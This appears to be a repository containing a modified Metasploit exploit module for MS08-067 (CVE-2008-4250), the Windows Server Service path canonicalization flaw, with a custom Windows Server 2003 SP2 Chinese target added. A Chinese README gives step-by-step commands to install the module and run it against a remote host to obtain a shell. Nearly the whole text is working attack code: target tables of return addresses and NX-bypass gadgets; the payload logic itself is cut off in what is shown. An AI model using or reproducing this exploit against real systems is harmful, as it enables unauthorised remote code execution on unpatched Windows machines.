├── README.md └── ms08_067_netapi.rb /README.md: -------------------------------------------------------------------------------- 1 | ms08-067_Server_2003_Chinese_Version 2 | 3 | ## 使用方法 ## 4 | 覆盖文件(在`/usr/share`下) 5 | ``` 6 | use exploit/windows/smb/ms08-067_netapi 7 | set RHOST 192.168.1.11 8 | set Target 65 9 | run 10 | ``` 11 | 即可得到shell 12 | 来源[戳我](http://bbs.pediy.com/thread-186737.htm) 13 | -------------------------------------------------------------------------------- /ms08_067_netapi.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = GreatRanking 10 | 11 | include Msf::Exploit::Remote::DCERPC 12 | include Msf::Exploit::Remote::SMB::Client 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'MS08-067 Microsoft Server Service Relative Path Stack Corruption', 17 | 'Description' => %q{ 18 | This module exploits a parsing flaw in the path canonicalization code of 19 | NetAPI32.dll through the Server Service. This module is capable of bypassing 20 | NX on some operating systems and service packs. The correct target must be 21 | used to prevent the Server Service (along with a dozen others in the same 22 | process) from crashing. Windows XP targets seem to handle multiple successful 23 | exploitation events, but 2003 targets will often crash or hang on subsequent 24 | attempts. This is just the first version of this module, full support for 25 | NX bypass on 2003, along with other platforms, is still in development. 
26 | }, 27 | 'Author' => 28 | [ 29 | 'hdm', # with tons of input/help/testing from the community 30 | 'Brett Moore ', 31 | 'frank2 ', # check() detection 32 | 'jduck', # XP SP2/SP3 AlwaysOn DEP bypass 33 | ], 34 | 'License' => MSF_LICENSE, 35 | 'References' => 36 | [ 37 | %w(CVE 2008-4250), 38 | %w(OSVDB 49243), 39 | %w(MSB MS08-067), 40 | # If this vulnerability is found, ms08-67 is exposed as well 41 | ['URL', 'http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos'] 42 | ], 43 | 'DefaultOptions' => 44 | { 45 | 'EXITFUNC' => 'thread', 46 | }, 47 | 'Privileged' => true, 48 | 'Payload' => 49 | { 50 | 'Space' => 408, 51 | 'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40", 52 | 'Prepend' => "\x81\xE4\xF0\xFF\xFF\xFF", # stack alignment 53 | 'StackAdjustment' => -3500, 54 | 55 | }, 56 | 'Platform' => 'win', 57 | 'DefaultTarget' => 0, 58 | 'Targets' => 59 | [ 60 | # 61 | # Automatic targetting via fingerprinting 62 | # 63 | ['Automatic Targeting', { 'auto' => true }], 64 | 65 | # 66 | # UNIVERSAL TARGETS 67 | # 68 | 69 | # 70 | # Antoine's universal for Windows 2000 71 | # Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET 72 | # 73 | ['Windows 2000 Universal', 74 | { 75 | 'Ret' => 0x001f1cb0, 76 | 'Scratch' => 0x00020408, 77 | } 78 | ], # JMP EDI SVCHOST.EXE 79 | 80 | # 81 | # Standard return-to-ESI without NX bypass 82 | # Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET 83 | # 84 | ['Windows XP SP0/SP1 Universal', 85 | { 86 | 'Ret' => 0x01001361, 87 | 'Scratch' => 0x00020408, 88 | } 89 | ], # JMP ESI SVCHOST.EXE 90 | 91 | # Standard return-to-ESI without NX bypass 92 | ['Windows 2003 SP0 Universal', 93 | { 94 | 'Ret' => 0x0100129e, 95 | 'Scratch' => 0x00020408, 96 | } 97 | ], # JMP ESI SVCHOST.EXE 98 | 99 | # 100 | # ENGLISH TARGETS 101 | # 102 | 103 | # jduck's AlwaysOn NX Bypass for XP SP2 104 | ['Windows XP SP2 English (AlwaysOn NX)', 105 | { 106 | # No pivot is needed, we drop into our rop 107 | 'Scratch' => 0x00020408, 108 | 'UseROP' => 
'5.1.2600.2180' 109 | } 110 | ], 111 | 112 | # Metasploit's NX bypass for XP SP2/SP3 113 | ['Windows XP SP2 English (NX)', 114 | { 115 | 'Ret' => 0x6f88f727, 116 | 'DisableNX' => 0x6f8916e2, 117 | 'Scratch' => 0x00020408 118 | } 119 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 120 | 121 | # jduck's AlwaysOn NX Bypass for XP SP3 122 | ['Windows XP SP3 English (AlwaysOn NX)', 123 | { 124 | # No pivot is needed, we drop into our rop 125 | 'Scratch' => 0x00020408, 126 | 'UseROP' => '5.1.2600.5512' 127 | } 128 | ], 129 | 130 | # Metasploit's NX bypass for XP SP2/SP3 131 | ['Windows XP SP3 English (NX)', 132 | { 133 | 'Ret' => 0x6f88f807, 134 | 'DisableNX' => 0x6f8917c2, 135 | 'Scratch' => 0x00020408 136 | } 137 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 138 | 139 | # 140 | # NON-ENGLISH TARGETS - AUTOMATICALLY GENERATED 141 | # 142 | 143 | # Metasploit's NX bypass for XP SP2/SP3 144 | ['Windows XP SP2 Arabic (NX)', 145 | { 146 | 'Ret' => 0x6fd8f727, 147 | 'DisableNX' => 0x6fd916e2, 148 | 'Scratch' => 0x00020408 149 | } 150 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 151 | 152 | # Metasploit's NX bypass for XP SP2/SP3 153 | ['Windows XP SP2 Chinese - Traditional / Taiwan (NX)', 154 | { 155 | 'Ret' => 0x5860f727, 156 | 'DisableNX' => 0x586116e2, 157 | 'Scratch' => 0x00020408 158 | } 159 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 160 | 161 | # Metasploit's NX bypass for XP SP2/SP3 162 | ['Windows XP SP2 Chinese - Simplified (NX)', 163 | { 164 | 'Ret' => 0x58fbf727, 165 | 'DisableNX' => 0x58fc16e2, 166 | 'Scratch' => 0x00020408 167 | } 168 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 169 | 170 | # Metasploit's NX bypass for XP SP2/SP3 171 | ['Windows XP SP2 Chinese - Traditional (NX)', 172 | { 173 | 'Ret' => 0x5860f727, 174 | 'DisableNX' => 0x586116e2, 175 | 'Scratch' => 0x00020408 176 | } 177 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 178 | 179 | # Metasploit's NX bypass for XP SP2/SP3 180 | ['Windows XP 
SP2 Czech (NX)', 181 | { 182 | 'Ret' => 0x6fe1f727, 183 | 'DisableNX' => 0x6fe216e2, 184 | 'Scratch' => 0x00020408 185 | } 186 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 187 | 188 | # Metasploit's NX bypass for XP SP2/SP3 189 | ['Windows XP SP2 Danish (NX)', 190 | { 191 | 'Ret' => 0x5978f727, 192 | 'DisableNX' => 0x597916e2, 193 | 'Scratch' => 0x00020408 194 | } 195 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 196 | 197 | # Metasploit's NX bypass for XP SP2/SP3 198 | ['Windows XP SP2 German (NX)', 199 | { 200 | 'Ret' => 0x6fd9f727, 201 | 'DisableNX' => 0x6fda16e2, 202 | 'Scratch' => 0x00020408 203 | } 204 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 205 | 206 | # Metasploit's NX bypass for XP SP2/SP3 207 | ['Windows XP SP2 Greek (NX)', 208 | { 209 | 'Ret' => 0x592af727, 210 | 'DisableNX' => 0x592b16e2, 211 | 'Scratch' => 0x00020408 212 | } 213 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 214 | 215 | # Metasploit's NX bypass for XP SP2/SP3 216 | ['Windows XP SP2 Spanish (NX)', 217 | { 218 | 'Ret' => 0x6fdbf727, 219 | 'DisableNX' => 0x6fdc16e2, 220 | 'Scratch' => 0x00020408 221 | } 222 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 223 | 224 | # Metasploit's NX bypass for XP SP2/SP3 225 | ['Windows XP SP2 Finnish (NX)', 226 | { 227 | 'Ret' => 0x597df727, 228 | 'DisableNX' => 0x597e16e2, 229 | 'Scratch' => 0x00020408 230 | } 231 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 232 | 233 | # Metasploit's NX bypass for XP SP2/SP3 234 | ['Windows XP SP2 French (NX)', 235 | { 236 | 'Ret' => 0x595bf727, 237 | 'DisableNX' => 0x595c16e2, 238 | 'Scratch' => 0x00020408 239 | } 240 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 241 | 242 | # Metasploit's NX bypass for XP SP2/SP3 243 | ['Windows XP SP2 Hebrew (NX)', 244 | { 245 | 'Ret' => 0x5940f727, 246 | 'DisableNX' => 0x594116e2, 247 | 'Scratch' => 0x00020408 248 | } 249 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 250 | 251 | # Metasploit's NX bypass 
for XP SP2/SP3 252 | ['Windows XP SP2 Hungarian (NX)', 253 | { 254 | 'Ret' => 0x5970f727, 255 | 'DisableNX' => 0x597116e2, 256 | 'Scratch' => 0x00020408 257 | } 258 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 259 | 260 | # Metasploit's NX bypass for XP SP2/SP3 261 | ['Windows XP SP2 Italian (NX)', 262 | { 263 | 'Ret' => 0x596bf727, 264 | 'DisableNX' => 0x596c16e2, 265 | 'Scratch' => 0x00020408 266 | } 267 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 268 | 269 | # Metasploit's NX bypass for XP SP2/SP3 270 | ['Windows XP SP2 Japanese (NX)', 271 | { 272 | 'Ret' => 0x567fd3be, 273 | 'DisableNX' => 0x568016e2, 274 | 'Scratch' => 0x00020408 275 | } 276 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 277 | 278 | # Metasploit's NX bypass for XP SP2/SP3 279 | ['Windows XP SP2 Korean (NX)', 280 | { 281 | 'Ret' => 0x6fd6f727, 282 | 'DisableNX' => 0x6fd716e2, 283 | 'Scratch' => 0x00020408 284 | } 285 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 286 | 287 | # Metasploit's NX bypass for XP SP2/SP3 288 | ['Windows XP SP2 Dutch (NX)', 289 | { 290 | 'Ret' => 0x596cf727, 291 | 'DisableNX' => 0x596d16e2, 292 | 'Scratch' => 0x00020408 293 | } 294 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 295 | 296 | # Metasploit's NX bypass for XP SP2/SP3 297 | ['Windows XP SP2 Norwegian (NX)', 298 | { 299 | 'Ret' => 0x597cf727, 300 | 'DisableNX' => 0x597d16e2, 301 | 'Scratch' => 0x00020408 302 | } 303 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 304 | 305 | # Metasploit's NX bypass for XP SP2/SP3 306 | ['Windows XP SP2 Polish (NX)', 307 | { 308 | 'Ret' => 0x5941f727, 309 | 'DisableNX' => 0x594216e2, 310 | 'Scratch' => 0x00020408 311 | } 312 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 313 | 314 | # Metasploit's NX bypass for XP SP2/SP3 315 | ['Windows XP SP2 Portuguese - Brazilian (NX)', 316 | { 317 | 'Ret' => 0x596ff727, 318 | 'DisableNX' => 0x597016e2, 319 | 'Scratch' => 0x00020408 320 | } 321 | ], # JMP ESI ACGENRAL.DLL, NX/NX 
BYPASS ACGENRAL.DLL 322 | 323 | # Metasploit's NX bypass for XP SP2/SP3 324 | ['Windows XP SP2 Portuguese (NX)', 325 | { 326 | 'Ret' => 0x596bf727, 327 | 'DisableNX' => 0x596c16e2, 328 | 'Scratch' => 0x00020408 329 | } 330 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 331 | 332 | # Metasploit's NX bypass for XP SP2/SP3 333 | ['Windows XP SP2 Russian (NX)', 334 | { 335 | 'Ret' => 0x6fe1f727, 336 | 'DisableNX' => 0x6fe216e2, 337 | 'Scratch' => 0x00020408 338 | } 339 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 340 | 341 | # Metasploit's NX bypass for XP SP2/SP3 342 | ['Windows XP SP2 Swedish (NX)', 343 | { 344 | 'Ret' => 0x597af727, 345 | 'DisableNX' => 0x597b16e2, 346 | 'Scratch' => 0x00020408 347 | } 348 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 349 | 350 | # Metasploit's NX bypass for XP SP2/SP3 351 | ['Windows XP SP2 Turkish (NX)', 352 | { 353 | 'Ret' => 0x5a78f727, 354 | 'DisableNX' => 0x5a7916e2, 355 | 'Scratch' => 0x00020408 356 | } 357 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 358 | 359 | # Metasploit's NX bypass for XP SP2/SP3 360 | ['Windows XP SP3 Arabic (NX)', 361 | { 362 | 'Ret' => 0x6fd8f807, 363 | 'DisableNX' => 0x6fd917c2, 364 | 'Scratch' => 0x00020408 365 | } 366 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 367 | 368 | # Metasploit's NX bypass for XP SP2/SP3 369 | ['Windows XP SP3 Chinese - Traditional / Taiwan (NX)', 370 | { 371 | 'Ret' => 0x5860f807, 372 | 'DisableNX' => 0x586117c2, 373 | 'Scratch' => 0x00020408 374 | } 375 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 376 | 377 | # Metasploit's NX bypass for XP SP2/SP3 378 | ['Windows XP SP3 Chinese - Simplified (NX)', 379 | { 380 | 'Ret' => 0x58fbf807, 381 | 'DisableNX' => 0x58fc17c2, 382 | 'Scratch' => 0x00020408 383 | } 384 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 385 | 386 | # Metasploit's NX bypass for XP SP2/SP3 387 | ['Windows XP SP3 Chinese - Traditional (NX)', 388 | { 389 | 'Ret' => 0x5860f807, 390 | 'DisableNX' 
=> 0x586117c2, 391 | 'Scratch' => 0x00020408 392 | } 393 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 394 | 395 | # Metasploit's NX bypass for XP SP2/SP3 396 | ['Windows XP SP3 Czech (NX)', 397 | { 398 | 'Ret' => 0x6fe1f807, 399 | 'DisableNX' => 0x6fe217c2, 400 | 'Scratch' => 0x00020408 401 | } 402 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 403 | 404 | # Metasploit's NX bypass for XP SP2/SP3 405 | ['Windows XP SP3 Danish (NX)', 406 | { 407 | 'Ret' => 0x5978f807, 408 | 'DisableNX' => 0x597917c2, 409 | 'Scratch' => 0x00020408 410 | } 411 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 412 | 413 | # Metasploit's NX bypass for XP SP2/SP3 414 | ['Windows XP SP3 German (NX)', 415 | { 416 | 'Ret' => 0x6fd9f807, 417 | 'DisableNX' => 0x6fda17c2, 418 | 'Scratch' => 0x00020408 419 | } 420 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 421 | 422 | # Metasploit's NX bypass for XP SP2/SP3 423 | ['Windows XP SP3 Greek (NX)', 424 | { 425 | 'Ret' => 0x592af807, 426 | 'DisableNX' => 0x592b17c2, 427 | 'Scratch' => 0x00020408 428 | } 429 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 430 | 431 | # Metasploit's NX bypass for XP SP2/SP3 432 | ['Windows XP SP3 Spanish (NX)', 433 | { 434 | 'Ret' => 0x6fdbf807, 435 | 'DisableNX' => 0x6fdc17c2, 436 | 'Scratch' => 0x00020408 437 | } 438 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 439 | 440 | # Metasploit's NX bypass for XP SP2/SP3 441 | ['Windows XP SP3 Finnish (NX)', 442 | { 443 | 'Ret' => 0x597df807, 444 | 'DisableNX' => 0x597e17c2, 445 | 'Scratch' => 0x00020408 446 | } 447 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 448 | 449 | # Metasploit's NX bypass for XP SP2/SP3 450 | ['Windows XP SP3 French (NX)', 451 | { 452 | 'Ret' => 0x595bf807, 453 | 'DisableNX' => 0x595c17c2, 454 | 'Scratch' => 0x00020408 455 | } 456 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 457 | 458 | # Metasploit's NX bypass for XP SP2/SP3 459 | ['Windows XP SP3 Hebrew (NX)', 460 | { 461 | 'Ret' 
=> 0x5940f807, 462 | 'DisableNX' => 0x594117c2, 463 | 'Scratch' => 0x00020408 464 | } 465 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 466 | 467 | # Metasploit's NX bypass for XP SP2/SP3 468 | ['Windows XP SP3 Hungarian (NX)', 469 | { 470 | 'Ret' => 0x5970f807, 471 | 'DisableNX' => 0x597117c2, 472 | 'Scratch' => 0x00020408 473 | } 474 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 475 | 476 | # Metasploit's NX bypass for XP SP2/SP3 477 | ['Windows XP SP3 Italian (NX)', 478 | { 479 | 'Ret' => 0x596bf807, 480 | 'DisableNX' => 0x596c17c2, 481 | 'Scratch' => 0x00020408 482 | } 483 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 484 | 485 | # Metasploit's NX bypass for XP SP2/SP3 486 | ['Windows XP SP3 Japanese (NX)', 487 | { 488 | 'Ret' => 0x567fd4d2, 489 | 'DisableNX' => 0x568017c2, 490 | 'Scratch' => 0x00020408 491 | } 492 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 493 | 494 | # Metasploit's NX bypass for XP SP2/SP3 495 | ['Windows XP SP3 Korean (NX)', 496 | { 497 | 'Ret' => 0x6fd6f807, 498 | 'DisableNX' => 0x6fd717c2, 499 | 'Scratch' => 0x00020408 500 | } 501 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 502 | 503 | # Metasploit's NX bypass for XP SP2/SP3 504 | ['Windows XP SP3 Dutch (NX)', 505 | { 506 | 'Ret' => 0x596cf807, 507 | 'DisableNX' => 0x596d17c2, 508 | 'Scratch' => 0x00020408 509 | } 510 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 511 | 512 | # Metasploit's NX bypass for XP SP2/SP3 513 | ['Windows XP SP3 Norwegian (NX)', 514 | { 515 | 'Ret' => 0x597cf807, 516 | 'DisableNX' => 0x597d17c2, 517 | 'Scratch' => 0x00020408 518 | } 519 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 520 | 521 | # Metasploit's NX bypass for XP SP2/SP3 522 | ['Windows XP SP3 Polish (NX)', 523 | { 524 | 'Ret' => 0x5941f807, 525 | 'DisableNX' => 0x594217c2, 526 | 'Scratch' => 0x00020408 527 | } 528 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 529 | 530 | # Metasploit's NX bypass for XP SP2/SP3 531 | ['Windows 
XP SP3 Portuguese - Brazilian (NX)', 532 | { 533 | 'Ret' => 0x596ff807, 534 | 'DisableNX' => 0x597017c2, 535 | 'Scratch' => 0x00020408 536 | } 537 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 538 | 539 | # Metasploit's NX bypass for XP SP2/SP3 540 | ['Windows XP SP3 Portuguese (NX)', 541 | { 542 | 'Ret' => 0x596bf807, 543 | 'DisableNX' => 0x596c17c2, 544 | 'Scratch' => 0x00020408 545 | } 546 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 547 | 548 | # Metasploit's NX bypass for XP SP2/SP3 549 | ['Windows XP SP3 Russian (NX)', 550 | { 551 | 'Ret' => 0x6fe1f807, 552 | 'DisableNX' => 0x6fe217c2, 553 | 'Scratch' => 0x00020408 554 | } 555 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 556 | 557 | # Metasploit's NX bypass for XP SP2/SP3 558 | ['Windows XP SP3 Swedish (NX)', 559 | { 560 | 'Ret' => 0x597af807, 561 | 'DisableNX' => 0x597b17c2, 562 | 'Scratch' => 0x00020408 563 | } 564 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 565 | 566 | # Metasploit's NX bypass for XP SP2/SP3 567 | ['Windows XP SP3 Turkish (NX)', 568 | { 569 | 'Ret' => 0x5a78f807, 570 | 'DisableNX' => 0x5a7917c2, 571 | 'Scratch' => 0x00020408 572 | } 573 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 574 | 575 | # 576 | # Windows 2003 Targets 577 | # 578 | 579 | # Standard return-to-ESI without NX bypass 580 | ['Windows 2003 SP1 English (NO NX)', 581 | { 582 | 'Ret' => 0x71bf21a2, 583 | 'Scratch' => 0x00020408, 584 | } 585 | ], # JMP ESI WS2HELP.DLL 586 | 587 | # Brett Moore's crafty NX bypass for 2003 SP1 588 | ['Windows 2003 SP1 English (NX)', 589 | { 590 | 'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL 591 | 'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL 592 | 'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL 593 | 'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL 594 | 'Scratch' => 0x00020408, 595 | } 596 | ], 597 | 598 | # Standard return-to-ESI without NX bypass 599 | ['Windows 2003 SP1 Japanese (NO NX)', 600 | { 601 | 'Ret' => 
0x71a921a2, 602 | 'Scratch' => 0x00020408, 603 | } 604 | ], # JMP ESI WS2HELP.DLL 605 | 606 | # Standard return-to-ESI without NX bypass 607 | ['Windows 2003 SP1 Spanish (NO NX)', 608 | { 609 | 'Ret' => 0x71ac21a2, 610 | 'Scratch' => 0x00020408, 611 | } 612 | ], # JMP ESI WS2HELP.DLL 613 | 614 | # Brett Moore's crafty NX bypass for 2003 SP1 615 | ['Windows 2003 SP1 Spanish (NX)', 616 | { 617 | 'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL 618 | 'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL 619 | 'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL 620 | 'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL 621 | 'Scratch' => 0x00020408, 622 | } 623 | ], 624 | # Standard return-to-ESI without NX bypass 625 | # Added by Omar MEZRAG - 0xFFFFFF 626 | [ 'Windows 2003 SP1 French (NO NX)', 627 | { 628 | 'Ret' => 0x71ac1c40 , 629 | 'Scratch' => 0x00020408 630 | } 631 | ], # JMP ESI WS2HELP.DLL 632 | 633 | # Brett Moore's crafty NX bypass for 2003 SP1 634 | # Added by Omar MEZRAG - 0xFFFFFF 635 | [ 'Windows 2003 SP1 French (NX)', 636 | { 637 | 'RetDec' => 0x7CA2568C, # dec ESI, ret @SHELL32.DLL 638 | 'RetPop' => 0x7CB47CF4, # push ESI, pop EBP, ret 4 @SHELL32.DLL 639 | 'JmpESP' => 0x7C98FED3, # jmp ESP @NTDLL.DLL 640 | 'DisableNX' => 0x7C95E413, # NX disable @NTDLL.DLL 641 | 'Scratch' => 0x00020408 642 | } 643 | ], 644 | 645 | # Standard return-to-ESI without NX bypass 646 | ['Windows 2003 SP2 English (NO NX)', 647 | { 648 | 'Ret' => 0x71bf3969, 649 | 'Scratch' => 0x00020408, 650 | } 651 | ], # JMP ESI WS2HELP.DLL 652 | 653 | # Brett Moore's crafty NX bypass for 2003 SP2 654 | ['Windows 2003 SP2 English (NX)', 655 | { 656 | 'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL 657 | 'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL 658 | 'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL 659 | 'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL 660 | 'Scratch' => 0x00020408, 661 | } 662 | ], 663 | #my add 664 | [ 'Windows 2003 SP2 Chinese (NX)', 665 | { 666 | 
'RetDec' => 0x7c99beb8, # dec ESI, ret @NTDLL.DLL (0x4EC3) 667 | 'RetPop' => 0x7cb5e84e, # push ESI, pop EBP, ret @SHELL32.DLL(0x565DC3) 668 | 'JmpESP' => 0x7c99a01b, # jmp ESP @NTDLL.DLL(0xFFE4) 669 | 'DisableNX' => 0x7c96f517, # NX disable @NTDLL.DLL 670 | 'Scratch' => 0x00020408, 671 | } 672 | ], 673 | 674 | # Standard return-to-ESI without NX bypass 675 | ['Windows 2003 SP2 German (NO NX)', 676 | { 677 | 'Ret' => 0x71a03969, 678 | 'Scratch' => 0x00020408, 679 | } 680 | ], # JMP ESI WS2HELP.DLL 681 | 682 | # Brett Moore's crafty NX bypass for 2003 SP2 683 | ['Windows 2003 SP2 German (NX)', 684 | { 685 | 'RetDec' => 0x7c98beb8, # dec ESI, ret @NTDLL.DLL 686 | 'RetPop' => 0x7cb3e84e, # push ESI, pop EBP, ret @SHELL32.DLL 687 | 'JmpESP' => 0x7c98a01b, # jmp ESP @NTDLL.DLL 688 | 'DisableNX' => 0x7c95f517, # NX disable @NTDLL.DLL 689 | 'Scratch' => 0x00020408, 690 | } 691 | ], 692 | 693 | # Brett Moore's crafty NX bypass for 2003 SP2 (target by Anderson Bargas) 694 | [ 'Windows 2003 SP2 Portuguese - Brazilian (NX)', 695 | { 696 | 'RetDec' => 0x7c97beb8, # dec ESI, ret @NTDLL.DLL OK 697 | 'RetPop' => 0x7cb2e84e, # push ESI, pop EBP, ret @SHELL32.DLL OK 698 | 'JmpESP' => 0x7c97a01b, # jmp ESP @NTDLL.DLL OK 699 | 'DisableNX' => 0x7c94f517, # NX disable @NTDLL.DLL 700 | 'Scratch' => 0x00020408, 701 | } 702 | ], 703 | # Standard return-to-ESI without NX bypass 704 | ['Windows 2003 SP2 Spanish (NO NX)', 705 | { 706 | 'Ret' => 0x71ac3969, 707 | 'Scratch' => 0x00020408, 708 | } 709 | ], # JMP ESI WS2HELP.DLL 710 | 711 | # Brett Moore's crafty NX bypass for 2003 SP2 712 | ['Windows 2003 SP2 Spanish (NX)', 713 | { 714 | 'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL 715 | 'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL 716 | 'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL 717 | 'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL 718 | 'Scratch' => 0x00020408, 719 | } 720 | ], 721 | 722 | # Standard return-to-ESI without NX bypass 723 | # Provided by Masashi 
Fujiwara 724 | ['Windows 2003 SP2 Japanese (NO NX)', 725 | { 726 | 'Ret' => 0x71a91ed2, 727 | 'Scratch' => 0x00020408 728 | } 729 | ], # JMP ESI WS2HELP.DLL 730 | # Standard return-to-ESI without NX bypass 731 | # Added by Omar MEZRAG - 0xFFFFFF 732 | [ 'Windows 2003 SP2 French (NO NX)', 733 | { 734 | 'Ret' => 0x71AC2069, 735 | 'Scratch' => 0x00020408 736 | } 737 | ], # CALL ESI WS2HELP.DLL 738 | 739 | # Brett Moore's crafty NX bypass for 2003 SP2 740 | # Added by Omar MEZRAG - 0xFFFFFF 741 | [ 'Windows 2003 SP2 French (NX)', 742 | { 743 | 'RetDec' => 0x7C98BEB8, # dec ESI, ret @NTDLL.DLL 744 | 'RetPop' => 0x7CB3E84E, # push ESI, pop EBP, ret @SHELL32.DLL 745 | 'JmpESP' => 0x7C98A01B, # jmp ESP @NTDLL.DLL 746 | 'DisableNX' => 0x7C95F517, # NX disable @NTDLL.DLL 747 | 'Scratch' => 0x00020408 748 | } 749 | ], 750 | 751 | # 752 | # Missing Targets 753 | # Key: T=TODO ?=UNKNOWN U=UNRELIABLE 754 | # 755 | # [?] Windows Vista SP0 - Not tested yet 756 | # [?] Windows Vista SP1 - Not tested yet 757 | # 758 | ], 759 | 760 | 'DisclosureDate' => 'Oct 28 2008')) 761 | 762 | register_options( 763 | [ 764 | OptString.new('SMBPIPE', [true, 'The pipe name to use (BROWSER, SRVSVC)', 'BROWSER']), 765 | ], self.class) 766 | end 767 | 768 | # 769 | # 770 | # *** WINDOWS XP SP2/SP3 TARGETS *** 771 | # 772 | # 773 | # This exploit bypasses NX/NX by returning to a function call inside acgenral.dll that disables NX 774 | # for the process and then returns back to a call ESI instruction. These addresses are different 775 | # between operating systems, service packs, and language packs, but the steps below can be used to 776 | # add new targets. 777 | # 778 | # 779 | # If the target system does not have NX/NX, just place a "call ESI" return into both the Ret and 780 | # DisableNX elements of the target hash. 781 | # 782 | # If the target system does have NX/NX, obtain a copy of the acgenral.dll from that system. 
